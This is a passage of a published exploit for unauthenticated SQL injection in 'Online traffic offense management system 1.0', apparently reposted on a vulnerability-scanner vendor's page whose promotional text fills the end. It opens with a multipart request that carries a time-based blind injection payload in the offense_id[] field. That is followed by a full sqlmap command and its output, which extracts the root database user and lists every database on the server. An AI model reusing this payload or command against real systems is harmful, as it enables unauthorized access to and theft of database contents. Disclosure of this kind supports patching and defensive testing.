Content-Disposition: form-data; name="offense_id[]"

1' AND (SELECT 4422 FROM (SELECT(SLEEP(5)))wQes) AND 'GuRX'='GuRX
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--
[...]

# Dump user, used database, all databases on the server using sqlmap

C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 -r C:\Users\Hubert\Desktop\0day\sql2 --dbms=MySQL --current-user --current-db --dbs --batch
[...]
[06:06:23] [INFO] testing MySQL
[06:06:23] [INFO] confirming MySQL
[06:06:24] [WARNING] reflective value(s) found and filtering out
[06:06:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.48, PHP 7.4.23
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:06:24] [INFO] fetching current user
[06:06:24] [INFO] resumed: 'root@localhost'
current user: 'root@localhost'
[06:06:24] [INFO] fetching current database
[06:06:24] [INFO] retrieved: 'traffic_offense_db'
current database: 'traffic_offense_db'
[06:06:24] [INFO] fetching database names
[06:06:24] [INFO] retrieved: 'information_schema'
[06:06:24] [INFO] retrieved: 'mysql'
[06:06:24] [INFO] retrieved: 'performance_schema'
[06:06:24] [INFO] retrieved: 'phpmyadmin'
[06:06:24] [INFO] retrieved: 'test'
[06:06:24] [INFO] retrieved: 'test2'
[06:06:24] [INFO] retrieved: 'traffic_offense_db'
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] test2
[*] traffic_offense_db

[06:06:24] [INFO] fetched data logged to text files under 'C:\Users\Hubert\AppData\Local\sqlmap\output\localhost'

[*] ending @ 06:06:24 /2021-10-07/

Online traffic offense management system 1.0 multiple sql injection (unauthenticated) Vulnerability / Exploit Source : Online traffic offense management system 1.0 multiple sql injection (unauthenticated)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.